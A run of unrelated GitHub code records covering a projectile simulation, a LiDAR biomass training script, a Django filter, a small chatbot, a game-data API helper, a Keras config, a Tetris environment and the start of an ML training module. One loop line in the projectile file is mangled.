self.t.append(self.t[-1]+dt)\r\n self.vy.append(self.vy[-1]+dt*g)\r\n self.h.append(self.h[-1]-self.vy[-1]*dt)\r\n self.vx_projektila.append(self.vx_projektila[-1]+self.a_x*dt)\r\n\r\n return self.x, self.h, self.t, self.vy\r\n\r\n def vrijemePadanja(self, dt=0.01):\r\n self.dropProjectile(dt)\r\n return self.t[-1]\r\n\r\n def gadjanjeMete(self, x_mete, sirina, v_vjetra = 0):\r\n self.x_projektila = [0]\r\n self.t_gibanja = [0]\r\n self.h_projektila = [self.h0]\r\n\r\n time = np.arange(0, 100, 0.1)\r\n\r\n for t in time:\r\n\r\n while self.t_gibanja[-1]= x_mete-sirina and xx <= x_mete+sirina):\r\n trenutakIspustanja = t\r\n break\r\n\r\n\r\n for i in range (len(x_padanja)):\r\n x_padanja[i] = x_padanja[i]+self.x_projektila[-1]\r\n\r\n \r\n xxx = self.x_projektila + x_padanja\r\n yyy = self.h_projektila + h\r\n\r\n plt.plot(xxx, yyy)\r\n plt.title('Putanja projektila')\r\n plt.xlabel('x/m')\r\n plt.ylabel('y/m')\r\n plt.show()\r\n \r\n\r\n return trenutakIspustanja\r\n\r\n\r\n","repo_name":"anacavar/PAF","sub_path":"Kolokvij/modul.py","file_name":"modul.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35708720824","text":"import sys\r\nfrom pathlib import Path\r\nimport re\r\nimport os\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn.functional as F\r\nimport tqdm\r\nfrom torch_geometric.loader import DataLoader\r\nfrom torch_geometric.data import InMemoryDataset, Data\r\nfrom torch.utils.data import Sampler, ConcatDataset\r\n\r\nfrom shapely.geometry import Polygon\r\nfrom osgeo import gdal, gdal_array\r\ngdal.UseExceptions()\r\nimport laspy\r\nfrom laxpy.tree import LAXTree\r\nfrom laxpy.file import LAXParser\r\n\r\n\r\nfrom pn2_scalar_regressor import Net\r\nimport rasterizer\r\nfrom HDF5Loader import HDF5BiomassPointCloud\r\n\r\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\ndef train(model, optimizer, scheduler, train_loader, device, path):\r\n model.train()\r\n loss_list = []\r\n for i, data in enumerate(tqdm.tqdm(train_loader, desc=\"Training\")):\r\n if data.y.shape[-1] != train_loader.batch_size:\r\n print(\"Skipping last batch (not a full batch\")\r\n continue\r\n data = data.to(device)\r\n optimizer.zero_grad()\r\n out = model(data)[:, 0]\r\n loss = F.mse_loss(out, data.y)\r\n loss.backward()\r\n optimizer.step()\r\n if (i + 1) % 1 == 0:\r\n l = loss.detach().to(\"cpu\").numpy()\r\n # print(f'[{i + 1}/{len(train_loader)}] RMSE Loss: {np.sqrt(l):.4f} ')\r\n loss_list.append(l)\r\n if (i + 1) % 1000 == 0:\r\n print(f'mean RMSE loss last 1000 it: {np.mean(np.sqrt(loss_list[-1000:]))}')\r\n\r\n scheduler.step()\r\n print(f'mean RMSE loss this epoch: {np.sqrt(np.mean(loss_list))}')\r\n print(f'mean RMSE loss last 1000 it: {np.sqrt(np.mean(loss_list[-1000:]))}')\r\n\r\n return np.mean(loss_list)\r\n\r\n\r\n@torch.no_grad()\r\ndef test(model, loader):\r\n model.eval()\r\n losses = []\r\n for idx, data in enumerate(tqdm.tqdm(loader, desc=\"Testing\")):\r\n data = data.to(device)\r\n outs = model(data)[:, 0]\r\n loss = F.mse_loss(outs, data.y)\r\n\r\n if (idx + 1) % 1000 == 0:\r\n print(\"Sample differences in biomass:\")\r\n print(data.y.to('cpu').numpy(), ' - ', outs.to('cpu').numpy(), ' = ',\r\n data.y.to('cpu').numpy() - outs.to('cpu').numpy())\r\n losses.append(float(loss.to(\"cpu\")))\r\n return float(np.mean(losses))\r\n\r\n\r\ndef main(args):\r\n lr = float(args[0])\r\n min_lr = float(args[1])\r\n n_points = int(args[2])\r\n bs = int(args[3])\r\n \r\n # train_dataset = HDF5BiomassPointCloud(lasfiles=list(Path(r\"D:\\lwiniwar\\data\\uncertaintree\\PetawawaHarmonized\\Harmonized\\2012_ALS\\3_tiled_norm\").glob(\"*.laz\")),\r\n # biomassfile=os.path.expandvars(r\"D:\\lwiniwar\\data\\uncertaintree\\DeepBiomass\\RF_PRF_biomass_Ton_DRY_masked_train.tif\"),\r\n # backup_extract=os.path.expandvars(r\"D:\\lwiniwar\\data\\uncertaintree\\DeepBiomass\\train_presel.hdf5\"),\r\n # max_points=n_points\r\n # )\r\n # train_loader = DataLoader(train_dataset, batch_size=bs, shuffle=False,\r\n # num_workers=16)\r\n #\r\n # test_dataset = HDF5BiomassPointCloud(lasfiles=list(Path(r\"D:\\lwiniwar\\data\\uncertaintree\\PetawawaHarmonized\\Harmonized\\2012_ALS\\3_tiled_norm\").glob(\"*.laz\")),\r\n # biomassfile=os.path.expandvars(r\"D:\\lwiniwar\\data\\uncertaintree\\DeepBiomass\\RF_PRF_biomass_Ton_DRY_masked_val.tif\"),\r\n # backup_extract=os.path.expandvars(r\"D:\\lwiniwar\\data\\uncertaintree\\DeepBiomass\\val_presel.hdf5\"),\r\n # max_points=n_points\r\n # )\r\n # test_loader = DataLoader(test_dataset, batch_size=bs, shuffle=False,\r\n # num_workers=16)\r\n\r\n train_dataset_2012 = HDF5BiomassPointCloud(lasfiles=list(Path(r\"/tmp/lwiniwar/2012_norm\").glob(\"*.laz\")),\r\n biomassfile=os.path.expandvars(r\"$DATA/PetawawaHarmonized/biom_2012_train.tif\"),\r\n backup_extract=os.path.expandvars(r\"/tmp/lwiniwar/train_presel_2012.hdf5\"),\r\n max_points=n_points\r\n )\r\n train_dataset_2018 = HDF5BiomassPointCloud(lasfiles=list(Path(r\"/tmp/lwiniwar/2018_norm\").glob(\"*.laz\")),\r\n biomassfile=os.path.expandvars(r\"$DATA/PetawawaHarmonized/biom_2018_train.tif\"),\r\n backup_extract=os.path.expandvars(r\"/tmp/lwiniwar/train_presel_2018.hdf5\"),\r\n max_points=n_points\r\n )\r\n\r\n train_dataset = ConcatDataset([train_dataset_2012, train_dataset_2018])\r\n\r\n train_loader = DataLoader(train_dataset, batch_size=bs, shuffle=True,\r\n num_workers=16)\r\n\r\n\r\n\r\n test_dataset_2012 = HDF5BiomassPointCloud(lasfiles=list(Path(r\"/tmp/lwiniwar/2012_norm\").glob(\"*.laz\")),\r\n biomassfile=os.path.expandvars(r\"$DATA/PetawawaHarmonized/biom_2012_val.tif\"),\r\n backup_extract=os.path.expandvars(r\"/tmp/lwiniwar/val_presel_2012.hdf5\"),\r\n max_points=n_points\r\n )\r\n\r\n test_dataset_2018 = HDF5BiomassPointCloud(lasfiles=list(Path(r\"/tmp/lwiniwar/2018_norm\").glob(\"*.laz\")),\r\n biomassfile=os.path.expandvars(r\"$DATA/PetawawaHarmonized/biom_2018_val.tif\"),\r\n backup_extract=os.path.expandvars(r\"/tmp/lwiniwar/val_presel_2018.hdf5\"),\r\n max_points=n_points\r\n )\r\n\r\n test_dataset = ConcatDataset([test_dataset_2012, test_dataset_2018])\r\n test_loader = DataLoader(test_dataset, batch_size=bs, shuffle=False,\r\n num_workers=16)\r\n\r\n print(f\"Using {device} device.\")\r\n model = Net(num_features=0).to(device)\r\n optimizer = torch.optim.Adam(model.parameters(), lr=lr) #, weight_decay=dc)\r\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=50, eta_min=min_lr, last_epoch=-1, verbose=True)\r\n model_path = os.path.expandvars(\r\n rf'$DATA/PetawawaHarmonized/models/deepbiomass_lr{lr}_minLR{min_lr}_bs{bs}_{n_points}pts_normXYZ_2012+18.model')\r\n\r\n if os.path.exists(model_path):\r\n model = torch.load(model_path)\r\n print('loading existing model')\r\n\r\n for epoch in range(1, 1001):\r\n train_mse = train(model, optimizer, scheduler, train_loader, device, model_path)\r\n torch.save(model, model_path)\r\n test_mse = test(model, test_loader)\r\n\r\n with open(model_path.replace('.model', '.csv'), 'a') as f:\r\n f.write(\r\n f'{epoch}, {train_mse}, {test_mse}, {optimizer.param_groups[0][\"lr\"]}\\n'\r\n )\r\n print(f'Epoch: {epoch:02d}, Mean test MSE: {test_mse:.4f}')\r\n print(f'Epoch: {epoch:02d}, Mean train MSE: {train_mse:.4f}')\r\n\r\n\r\nif __name__ == '__main__':\r\n print('lr min_lr num_points batch_size')\r\n main(sys.argv[1:])\r\n","repo_name":"lwiniwar/DeepBiomass","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20698354113","text":"#coding=utf-8\r\n\r\n'''\r\n@author: 潘飞(cnweike@gmail.com)\r\n'''\r\n\r\nfrom django import template\r\nregister = template.Library()\r\n\r\n@register.filter\r\ndef limit(value,limit):\r\n '''需要一个长度参数'''\r\n limit = int(limit)\r\n addspots = False\r\n if len(value) > limit:\r\n addspots = True\r\n value = value[:limit]\r\n if addspots:\r\n value += '...'\r\n return value","repo_name":"killimpossible/opengroup","sub_path":"main/templatetags/main_filters.py","file_name":"main_filters.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"7810647438","text":"'''\nGiven a string that may contain a letter f. Print the index of the first\nand last occurrence of f. If the letter f occurs only once, then output\nits index once. If the letter f does not occur, print -1.\n'''\ns = input()\nind1 = ind2 = -1\nfor x in range(len(s)):\n if s[x] == 'f':\n if ind1 == -1:\n ind1 = x\n ind2 = x\n else:\n ind2 = x\nif ind1 == ind2:\n print(ind1)\nelse:\n print(ind1, ind2)\n","repo_name":"cookiewho/IPS_Workshop_2020","sub_path":"Python Practice/5.5_FirstAndLastOccurance.py","file_name":"5.5_FirstAndLastOccurance.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70585930386","text":"import warnings\nimport wikipedia\nimport datetime\nfrom PyDictionary import PyDictionary\n\ndictionary = PyDictionary()\nwarnings.filterwarnings('ignore')\n\n\ndef dic(dicSearch):\n try:\n dicResults = dictionary.meaning(dicSearch)\n results = dicResults.items()\n return results\n except EOFError as e:\n error = \"Sorry, i quite can't get the meaning of \" + dicSearch + \" right now.\"\n return error\n\n\ndef dateTime():\n current_time = datetime.datetime.now().strftime('%I:%M %p')\n return current_time\n\n\ndef wiki(wikiSearch):\n try:\n searchResults = wikipedia.summary(wikiSearch, sentences=2)\n return searchResults\n except EOFError as e:\n error = \"Sorry, i can't quite get to wikipedia right now.\"\n return error\n\n\ndef makeNote(myBotName):\n note = input(myBotName + \" Said : \\n What do want to note down? :\")\n if note != \"\":\n done = False\n while not done:\n with open(\"notes\" + '.txt', 'a') as w:\n w.write(\"\\n\" + note)\n done = True\n print(myBotName + \" Said : \\n I have created the note\")\n\n\ndef getNote():\n with open(\"notes\" + '.txt', 'r') as w:\n return w.read()","repo_name":"Faruq-Abdulrazaq/pisciumBot","sub_path":"additionalFunctionalities.py","file_name":"additionalFunctionalities.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19817933330","text":"from sqlalchemy.ext.asyncio import AsyncConnection\n\nfrom ...schemas.gameenums import COND_TYPE_NAME\nfrom ...schemas.nice import NiceCommonRelease\nfrom ...schemas.raw import MstCommonRelease\nfrom ..raw import get_common_releases\n\n\ndef get_nice_common_release(release: MstCommonRelease) -> NiceCommonRelease:\n return NiceCommonRelease(\n id=release.id,\n priority=release.priority,\n condGroup=release.condGroup,\n condType=COND_TYPE_NAME[release.condType],\n condId=release.condId,\n condNum=release.condNum,\n )\n\n\nasync def get_nice_common_releases_from_id(\n conn: AsyncConnection, common_release_id: int\n) -> list[NiceCommonRelease]:\n return [\n get_nice_common_release(common_release)\n for common_release in await get_common_releases(conn, [common_release_id])\n ]\n","repo_name":"atlasacademy/fgo-game-data-api","sub_path":"app/core/nice/common_release.py","file_name":"common_release.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"48"} +{"seq_id":"184586355","text":"\"\"\"\nTetris Simulator\n\nAuthor - Anqi Li (anqil4@cs.washington.edu)\nAdapted from the java simulator from Drew Bagnell's\ncourse at Carnegie Mellon University\n\n\"\"\"\n\n\nimport gym\nfrom gym.utils import seeding\nimport numpy as np\nimport copy \n\nclass TetrisState:\n \"\"\"\n the tetris state\n \"\"\"\n def __init__(self, field, top, next_piece, lost, turn, cleared):\n # the board configuration\n self.field = field\n # the top position\n self.top = top\n # the piece ID of the next piece\n self.next_piece = next_piece\n # whether the game has lost\n self.lost = lost\n # the current turn\n self.turn = turn\n # the number of rows cleared so far\n self.cleared = cleared \n\n def copy(self):\n return TetrisState(\n self.field.copy(),\n self.top.copy(),\n self.next_piece,\n self.lost,\n self.turn,\n self.cleared\n )\n\n\nclass TetrisEnv(gym.Env):\n metadata = {\n 'render.modes': ['ascii']\n }\n\n def __init__(self):\n print('********')\n self.n_cols = 10\n self.n_rows = 21\n self.n_pieces = 7\n self.state_size = 7\n self.score = 0\n self.game_end = False\n \n # the next several lists define the piece vocabulary in detail\n # width of the pieces [piece ID][orientation]\n # pieces: O, I, L, J, T, S, Z\n self.piece_orients = [1, 2, 4, 4, 4, 2, 2]\n self.piece_width = [\n [2],\n [1, 4],\n [2, 3, 2, 3],\n [2, 3, 2, 3],\n [2, 3, 2, 3],\n [3, 2],\n [3, 2]\n ]\n # height of pieces [piece ID][orientation]\n self.piece_height = [\n [2],\n [4, 1],\n [3, 2, 3, 2],\n [3, 2, 3, 2],\n [3, 2, 3, 2],\n [2, 3],\n [2, 3]\n ]\n self.piece_bottom = [\n [[0, 0]],\n [[0], [0, 0, 0, 0]],\n [[0, 0], [0, 1, 1], [2, 0], [0, 0, 0]],\n [[0, 0], [0, 0, 0], [0, 2], [1, 1, 0]],\n [[0, 1], [1, 0, 1], [1, 0], [0, 0, 0]],\n [[0, 0, 1], [1, 0]],\n [[1, 0, 0], [0, 1]]\n ]\n self.piece_top = [\n [[2, 2]],\n [[4], [1, 1, 1, 1]],\n [[3, 1], [2, 2, 2], [3, 3], [1, 1, 2]],\n [[1, 3], [2, 1, 1], [3, 3], [2, 2, 2]],\n [[3, 2], [1, 2, 1], [2, 3], [1, 2, 1]],\n [[1, 2, 2], [3, 2]],\n [[2, 2, 1], [2, 3]]\n ]\n self.piece_real_weight = [\n [[2, 2]],\n [[1,1,1,1],[4]],\n [[2,1,1],[1,3],[1,1,2],[3,1]],\n [[2,1,1],[3,1],[1,1,2],[1,3]],\n [[1,2,1],[1,3],[1,2,1],[3,1]],\n [[2,2],[1,2,1]],\n [[2,2],[1,2,1]]\n ]\n\n # initialize legal moves for all pieces\n self.legal_moves = []\n for i in range(self.n_pieces):\n piece_legal_moves = []\n for j in range(self.piece_orients[i]):\n for k in range(self.n_cols + 1 - self.piece_width[i][j]):\n piece_legal_moves.append([j, k])\n self.legal_moves.append(piece_legal_moves)\n\n self.state = None\n self.cleared_current_turn = 0\n\n def seed(self, seed=None):\n \"\"\"\n set the random seed for the environment\n \"\"\"\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def step(self, action):\n \"\"\"\n make a move based on the orientation and slot\n \"\"\"\n orient, slot = action\n self.state.turn += 1\n\n # height of the field\n height = max(\n self.state.top[slot+c] - self.piece_bottom[self.state.next_piece][orient][c]\n for c in range(self.piece_width[self.state.next_piece][orient])\n )\n\n # check if game ended\n if height + self.piece_height[self.state.next_piece][orient] >= self.n_rows:\n self.state.lost = True\n self.score += self._get_reward()\n return self.state, self._get_reward(), True, 0\n\n # for each column in the piece - fill in the appropriate blocks\n for i in range(self.piece_width[self.state.next_piece][orient]):\n # from bottom to top of brick\n for h in range(height + self.piece_bottom[self.state.next_piece][orient][i], height + self.piece_top[self.state.next_piece][orient][i]):\n self.state.field[h, i+slot] = self.state.turn\n\n # adjust top\n for c in range(self.piece_width[self.state.next_piece][orient]):\n self.state.top[slot+c] = height + self.piece_top[self.state.next_piece][orient][c]\n\n # check for full rows - starting at the top\n self.cleared_current_turn = 0\n for r in range(height + self.piece_height[self.state.next_piece][orient] - 1, height - 1, -1):\n # if the row was full - remove it and slide above stuff down\n if np.all(self.state.field[r] > 0):\n self.cleared_current_turn += 1\n self.state.cleared += 1\n # for each column\n for c in range(self.n_cols):\n # slide down all bricks\n self.state.field[r:self.state.top[c], c] = self.state.field[(r+1):(self.state.top[c]+1), c]\n # lower the top\n self.state.top[c] -= 1\n while self.state.top[c] >= 1 and self.state.field[self.state.top[c]-1, c] == 0:\n self.state.top[c] -= 1\n\n self.score += self.cleared_current_turn\n # pick a new piece\n self.state.next_piece = self._get_random_piece()\n return self.state.copy(), self._get_reward(), False, self.cleared_current_turn\n\n\n\n def reset(self):\n lost = False\n turn = 0\n cleared = 0\n\n field = np.zeros((self.n_rows, self.n_cols), dtype=np.int)\n top = np.zeros(self.n_cols, dtype=np.int)\n next_piece = self._get_random_piece()\n self.state = TetrisState(field, top, next_piece, lost, turn, cleared)\n self.score = 0\n return self.get_features(np.flip(copy.deepcopy(field)),self.state.top,0,0,False)\n\n def render(self, mode='ascii'):\n print('\\nThe wall:')\n print('-' * (2 * self.n_cols + 1))\n for r in range(self.n_rows - 1, -1, -1):\n render_string = '|'\n for c in range(self.n_cols):\n if self.state.field[r, c] > 0:\n render_string += '*|'\n else:\n render_string += ' |'\n render_string += ''\n print(render_string)\n print('-' * (2 * self.n_cols + 1))\n\n print('\\nThe next piece:')\n if self.state.next_piece == 0:\n print('**\\n**')\n elif self.state.next_piece == 1:\n print('****')\n elif self.state.next_piece == 2:\n print('*\\n*\\n**')\n elif self.state.next_piece == 3:\n print(' *\\n *\\n**')\n elif self.state.next_piece == 4:\n print(' * \\n***')\n elif self.state.next_piece == 5:\n print(' **\\n**')\n elif self.state.next_piece == 6:\n print('**\\n **')\n\n\n\n def close(self):\n pass\n\n def _get_random_piece(self):\n \"\"\"\n return an random integer 0-6\n \"\"\"\n return np.random.randint(self.n_pieces)\n\n def _get_reward(self):\n \"\"\"\n reward function\n \"\"\"\n return 1+self.score\n # return 0.0\n\n def get_actions(self):\n \"\"\"\n gives the legal moves for the next piece\n :return:\n \"\"\"\n return self.legal_moves[self.state.next_piece]\n\n def set_state(self, state):\n \"\"\"\n set the field and the next piece\n \"\"\"\n self.state = state.copy()\n\n def clear_lines(self,field,orient,slot):\n \n lines_to_clear = [index for index, row in enumerate(field) if np.all(field[index] > 0)]\n eroded = 0\n clear_piece = 0\n if lines_to_clear != []:\n for i in range(self.piece_height[self.state.next_piece][orient]):\n if (self.n_rows-(self.state.top[slot]+(self.piece_height[self.state.next_piece][orient]-(i+1)))) in lines_to_clear:\n clear_piece += (self.piece_real_weight[self.state.next_piece][orient][i])\n eroded = len(lines_to_clear) * clear_piece\n field = [row for index, row in enumerate(field) if index not in lines_to_clear]\n # Add new lines at the top\n for _ in lines_to_clear:\n field.insert(0, [0 for _ in range(self.n_cols)])\n\n return len(lines_to_clear),eroded, np.array(field)\n\n\n\n def get_wells_height(self, field):\n WIDTH = 10\n wells_height = 0\n HEIGHT = 21\n for x in range(1, WIDTH-1):\n for y in range(HEIGHT):\n if field[y][x] == 0 and field[y][x-1] != 0 \\\n and field[y][x+1] != 0:\n wells_height += 1\n for _y in range(y+1, 21):\n if field[_y][x] != 0:\n break\n wells_height += 1\n\n for y in range(HEIGHT):\n # check wells in the leftmost boarder of the board\n if field[y][0] == 0 and field[y][1] != 0:\n wells_height += 1\n for _y in range(y+1, 21):\n if field[_y][x] != 0:\n break\n wells_height += 1\n\n # check wells in the rightmost border of the board\n if field[y][WIDTH-1] == 0 and field[y][WIDTH-2] != 0:\n wells_height += 1\n for _y in range(y+1, 21):\n if field[_y][x] != 0:\n break\n wells_height += 1\n\n return wells_height\n\n def get_holes_at_square(self, field,row_index,col_index):\n row_index = 0\n holes_at_square = 1\n\n while row_index < len(field) - 1:\n if field[row_index][col_index] == 0:\n holes_at_square += 1\n row_index += 1\n else:\n break\n\n return holes_at_square\n\n def get_holes(self, field):\n \n holes = 0\n\n for row_index, row in enumerate(field):\n if row_index == 0: continue\n for col_index, square in enumerate(row):\n if square == 0 and field[row_index - 1][col_index] > 0:\n holes += self.get_holes_at_square(field, row_index, col_index)\n\n return holes\n\n def get_bumpiness(self,field):\n total_bumpiness = 0\n max_bumpiness = 0\n min_ys = []\n\n for col in zip(*field):\n i = 0\n while i < self.n_rows and col[i] ==0:\n i += 1\n min_ys.append(i)\n \n for i in range(len(min_ys) - 1):\n bumpiness = abs(min_ys[i] - min_ys[i+1])\n max_bumpiness = max(bumpiness, max_bumpiness)\n total_bumpiness += abs(min_ys[i] - min_ys[i+1])\n\n return total_bumpiness, max_bumpiness\n\n def get_height(self,field):\n sum_height = 0\n max_height = 0\n min_height = self.n_rows\n\n for col in zip(*field):\n i = 0\n while i < self.n_rows and col[i] == 0:\n i += 1\n height = self.n_rows - i\n sum_height += height\n if height > max_height:\n max_height = height\n elif height < min_height:\n min_height = height\n\n return sum_height, max_height, min_height\n\n def get_row_transitions(self,field):\n total = 0\n for r in range(self.n_rows):\n row_count = 0\n last_empty = False\n for c in range(self.n_cols):\n empty = field[r][c] == 0\n if last_empty != empty:\n row_count += 1\n last_empty = empty\n if last_empty:\n row_count += 1\n if last_empty and row_count == 2:\n continue\n total += row_count\n return total\n\n def get_cumulative_wells(self,field):\n wells = [0 for i in range(self.n_cols)]\n for y, row in enumerate(field):\n left_empty = True\n for x, code in enumerate(row):\n if code == 0:\n well = False\n right_empty = self.n_cols > x + 1 >= 0 and field[y][x + 1] == 0\n if left_empty or right_empty:\n well = True\n wells[x] = 0 if well else wells[x] + 1\n left_empty = True\n else:\n left_empty = False\n return sum(wells)\n\n def get_col_transitions(self,field):\n total = 0\n for c in range(self.n_cols):\n column_count = 0\n last_empty = False\n for r in reversed(range(self.n_rows)):\n empty = field[r][c] == 0\n if last_empty and not empty:\n column_count += 2\n last_empty = empty\n if last_empty and column_count == 1:\n continue\n total += column_count\n return total\n\n def get_row_holes(self, field):\n row_holes = 0\n\n for row_index, row in enumerate(field):\n if row_index == 0: continue\n for col_index, square in enumerate(row):\n if square == 0:\n row_holes+=row_holes\n break\n return row_holes\n \n def get_hole_count(self,field):\n hole_count = 0\n for x in range(self.n_cols):\n below = False\n for y in range(self.n_rows):\n empty = field[y][x] == 0\n if not below and not empty:\n below = True\n elif below and empty:\n hole_count += 1\n\n return hole_count\n\n def get_features(self,field,top,orient,slot,start):\n landheight = 0\n max_height=0\n eroded = 0\n col_trans = 0\n row_trans = 0\n holes = 0\n well = 0\n lines = 0\n total_bumpiness = 0\n hole_count = 0\n top_position = 0\n depth=0\n sum_height = 0\n if start:\n for i in range(self.piece_width[self.state.next_piece][orient]):\n top_position = max(top_position,self.state.top[slot+i])\n landheight = max(landheight,self.piece_top[self.state.next_piece][orient][i])\n \n landheight = top_position+landheight\n lines,eroded,field = self.clear_lines(field,orient,slot)\n total_bumpiness, max_bumpiness = self.get_bumpiness(field)\n\n col_trans = self.get_col_transitions(field)\n row_trans = self.get_row_transitions(field)\n\n well = self.get_wells_height(field)\n sum_height, max_height, min_height = self.get_height(field)\n hole_count = self.get_hole_count(field)\n depth = self.get_row_holes(field)\n top_list = top.tolist()\n diff_list = [abs(top_list[j]-top_list[j+1]) for j in range(len(top_list)-1) ]\n result = [landheight,eroded,row_trans,col_trans,hole_count,well,depth]\n return result\n\n def get_next_states(self):\n next_states = {}\n legal_moves = self.get_actions()\n for orient, slot in legal_moves:\n out_flag = 0\n height = max(\n self.state.top[slot+c] - self.piece_bottom[self.state.next_piece][orient][c]\n for c in range(self.piece_width[self.state.next_piece][orient])\n )\n\n field = copy.deepcopy(self.state.field)\n # for each column in the piece - fill in the appropriate blocks\n for i in range(self.piece_width[self.state.next_piece][orient]):\n # from bottom to top of brick\n for h in range(height + self.piece_bottom[self.state.next_piece][orient][i], height + self.piece_top[self.state.next_piece][orient][i]):\n if h >= self.n_cols:\n out_flag = 1\n break\n field[h, i+slot] = self.state.turn + 1\n if out_flag == 1:\n break\n if out_flag == 1:\n next_states[(orient, slot)] = self.get_features(np.flip(field),self.state.top,orient,slot,True)\n if out_flag ==0 :\n next_states[(orient, slot)] = self.get_features(np.flip(field),self.state.top,orient,slot,True)\n\n return next_states\n\n def get_state_size(self):\n return self.state_size\n\n def get_score(self):\n return self.score\n \n \n\nif __name__ == \"__main__\":\n\n # run a random policy on the tetris simulator\n\n # np.random.seed(1)\n env = TetrisEnv()\n env.reset()\n #env.render()\n \n\n for _ in range(10):\n\n actions = env.get_actions()\n action = actions[np.random.randint(len(actions))]\n orient, slot = action\n action_state_dict = env.get_next_states()\n print(env.get_features(np.flip(env.state.field),env.state.top,orient,slot,True))\n state, reward, done, _ = env.step(action)\n env.render()\n if done:\n break\n\n\n\n\n\n","repo_name":"salemon/rl_tetris","sub_path":"tetris.py","file_name":"tetris.py","file_ext":"py","file_size_in_byte":17393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5733373097","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport sys\nfrom keras.activations import softmax\nsys.path.append('models/layers/')\nfrom MyPooling import MyMeanPool,MyMaxPool\n\nCustomObjects = {\"softmax\": softmax,'MyMaxPool':MyMaxPool}\n\n\n\nbatch_size = 128\nnumber_classes = 2\nw2v_vec_dim = 256\nword_maxlen = 40\n\n\nchar_maxlen= 40\nword_maxlen= 40\n\nmodel_dir = 'data/share/single/'\njieba_dict = 'data/share/jieba/jieba_dict.txt'\nstopwords_path = 'data/share/jieba/stops.txt'\norigin_csv = 'data/data/atec_nlp_sim_train2.csv'\n\ndata_augment = False\nshuffer = False\n\n\nnofeats = False\nif nofeats:\n feats = [u'pading1', u'pading2']\nelse:\n feats = [u'q1_freq', u'q2_freq', u'freq_mean', u'freq_cross', u'q1_freq_sq',\n u'q2_freq_sq',\n u'len_diff',\n u'shingle_similarity_1',\n u'shingle_similarity_2',\n u'shingle_similarity_3',\n u'common_words',\n 'cwc_min',\n 'cwc_max',\n 'csc_min',\n 'csc_max',\n 'ctc_min',\n 'ctc_max',\n 'last_word_eq',\n 'first_word_eq',\n 'abs_len_diff',\n 'mean_len',\n 'token_set_ratio',\n 'token_sort_ratio',\n 'fuzz_ratio',\n 'fuzz_partial_ratio',\n 'longest_substr_ratio']\n\n\n# 'bin_dist1',\n# 'bin_dist2',\n# 'diff1',\n# 'diff2',\n# 'diff_norm1',\n# 'diff_norm2',\n# 'diff_uni1',\n# 'diff_uni2',\n\n# 'inter_uni_r1',\n# 'inter_uni_r2',\n# 'intersect_r1',\n# 'intersect_r2',\n# 'jaccard_dist1',\n# 'jaccard_dist2',\n\n# 'len_diff',\n# 'masi_dist1',\n# 'masi_dist2',\n# 'max1',\n# 'max2',\n# 'min1',\n# 'min2',\n\n\n# 'q1_len',\n# 'q1_q2_intersect',\n# 'q1_sum1',\n# 'q1_sum2',\n# 'q1_uni1',\n# 'q1_uni2',\n\n\n# 'q2_len',\n# 'q2_sum1',\n# 'q2_sum2',\n# 'q2_uni1',\n# 'q2_uni2',\n\n\nuse_pre_train = False\n\n\ncut_char_level = False\n\n# if cut_char_level:\n\n# data_cut_hdf = 'data/cache/train_cut_char.hdf'\n# train_feats = 'data/cache/train_feats_char.hdf'\n# data_feat_hdf = 'data/cache/train_magic_char.hdf'\n# train_df = 'data/cache/train_magic_char_train_f{0}.hdf'.format(len(feats))\n# dev_df = 'data/cache/train_magic_char_more_dev_f{0}.hdf'.format(len(feats))\n\n \n# else:\n# data_cut_hdf = 'data/cache/train_cut_word.hdf'\n# train_feats = 'data/cache/train_feats_word.hdf'\n# data_feat_hdf = 'data/cache/train_magic_word.hdf'\n# train_df = 'data/cache/train_magic_word_train_f{0}.hdf'.format(len(feats))\n# dev_df = 'data/cache/train_magic_word_more_dev_f{0}.hdf'.format(len(feats))\n\n\ndata_cut_hdf = 'data/cache/train_cut.hdf'\nword_embed_weights = 'data/share/my_w2v/word_embed_weight.npy'\nw2v_content_word_model = 'data/share/my_w2v/train_char.model'\nchar_embed_weights = 'data/share/my_w2v/char_embed_weight.npy'\nw2v_content_char_model = 'data/share/my_w2v/train_word.model'\n\n\nif cut_char_level:\n stack_path = 'data/share/stack/char_'\nelse:\n stack_path = 'data/share/stack/word_'\n\n\ntrain_featdires = ['data/feats0_train.csv',\n 'data/feats1_train.csv',\n 'data/feats2_train.csv',\n ]\n\ntest_featdires = ['data/feats0_test.csv',\n 'data/feats1_test.csv',\n 'data/feats2_test.csv']\n","repo_name":"zle1992/atec","sub_path":"utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","stars":109,"dataset":"github-code","pt":"48"} +{"seq_id":"17326708048","text":"__doc__ = \"\"\"Training routines containing mixed classifier types.\n\n.. note::\n\n This file has the potential to get cluttered like the\n :mod:`mtml.modeling._vte_models` module that is now deprecated.\n\nMixed classifier training.\n\"\"\"\n\n# pylint: disable=import-error\nimport numpy as np\nimport pandas as pd\nfrom sklearn.decomposition import PCA\nfrom sklearn.ensemble import BaggingClassifier, RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import (\n accuracy_score, precision_score, recall_score, roc_auc_score\n)\nfrom sklearn.svm import LinearSVC, SVC\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.preprocessing import 